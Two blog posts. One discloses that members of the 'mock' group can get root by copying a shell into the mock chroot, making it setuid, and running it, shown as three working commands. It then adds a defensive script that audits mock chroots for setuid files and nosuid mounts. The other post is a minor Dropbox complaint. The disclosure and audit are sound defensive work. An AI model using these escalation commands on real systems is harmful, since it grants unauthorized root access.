2010-11-09

Doesn't Anyone Think This Is a Problem?

I can trivially get root on a machine if the user is member of the 'mock' group.

$ /usr/bin/mock -r epel-5-i386 --copyin /bin/sh /
$ /usr/bin/mock -r epel-5-i386 --shell 'chmod 4755 /sh'
$ /var/lib/mock/epel-5-i386/root/sh
#

In order to use mock properly, you have to be in the mock group. It just doesn't work properly even with sudo unless you're in that group. Once you're in that group, you can elevate privs in the chroot it creates and run arbitrary scripts.

I did a quick Google and I can't even find anything with keywords like "mock is a gigantic security hole because mock has lots of suid root stuff in it that lets you trivially root a machine if you've ever gotten it to work properly in the past."

It doesn't make any sense to me. Talking to two admins today led me to conclude that they both knew about this problem, and thought it wasn't an issue.
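The steps above only pay off because the filesystem holding the chroot honours the setuid bit on the copied shell. As an added audit helper (not from the post and not part of mock itself), this POSIX shell script lists setuid/setgid files under each mock chroot root and reports whether the containing filesystem is mounted nosuid, which is the mount option that makes the kernel ignore such bits. It assumes mock's default chroot base of /var/lib/mock (overridable for testing), the util-linux findmnt tool, and getent for reading the mock group.

```shell
#!/bin/sh
# Audit helper for mock chroots: report setuid/setgid files inside each
# chroot root and whether that root sits on a nosuid mount.

# Print every setuid or setgid regular file below the given chroot root,
# one path per line. Stays on one filesystem so bind mounts are skipped.
find_setuid_files() {
    root="$1"
    [ -d "$root" ] || return 0
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Print "nosuid" when the mount containing PATH carries the nosuid option,
# otherwise "suid". Relies on findmnt from util-linux (assumed present).
mount_suid_state() {
    opts=$(findmnt -n -o OPTIONS --target "$1" 2>/dev/null)
    case ",$opts," in
        *,nosuid,*) echo nosuid ;;
        *)          echo suid ;;
    esac
}

# Print the members of the mock group, i.e. the accounts the post is about.
mock_group_members() {
    getent group mock 2>/dev/null | cut -d: -f4
}

# Walk every <config>/root directory under the mock base (default
# /var/lib/mock, first argument overrides it) and print one summary line
# per chroot. A non-zero count on a "suid" filesystem is the finding.
audit_mock_roots() {
    base="${1:-/var/lib/mock}"
    for root in "$base"/*/root; do
        [ -d "$root" ] || continue
        state=$(mount_suid_state "$root")
        count=$(find_setuid_files "$root" | wc -l | tr -d ' ')
        echo "$root: $count setuid/setgid files, filesystem is $state"
    done
}

# Stand-alone use: audit the default mock base and show who is in the group.
if [ "${MOCK_AUDIT_RUN:-0}" = 1 ]; then
    echo "mock group members: $(mock_group_members)"
    audit_mock_roots
fi
```

Run with MOCK_AUDIT_RUN=1 to audit a real host; anything other than "0 setuid/setgid files" on a filesystem reported as "suid" deserves a look, and remounting the chroot base nosuid removes the setuid route regardless of what gets copied in.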

2010-11-08

Broken Software is Broken

I have very low expectations of open source software, and I don't feel put out when I have to fix it. But when I use closed-source software I expect it to 'just work' and get frustrated when it doesn't.

sthorne@pearl~/w/netbox> dropbox stop
Dropbox isn't running!
sthorne@pearl~/w/netbox> dropbox start
Dropbox isn't running!
Dropbox is already running!
sthorne@pearl~/w/netbox> killall dropbox
sthorne@pearl~/w/netbox> dropbox start
Starting Dropbox...Done!

I really shouldn't complain too loudly, as I'm in the process of backing up all the email I've ever received to it.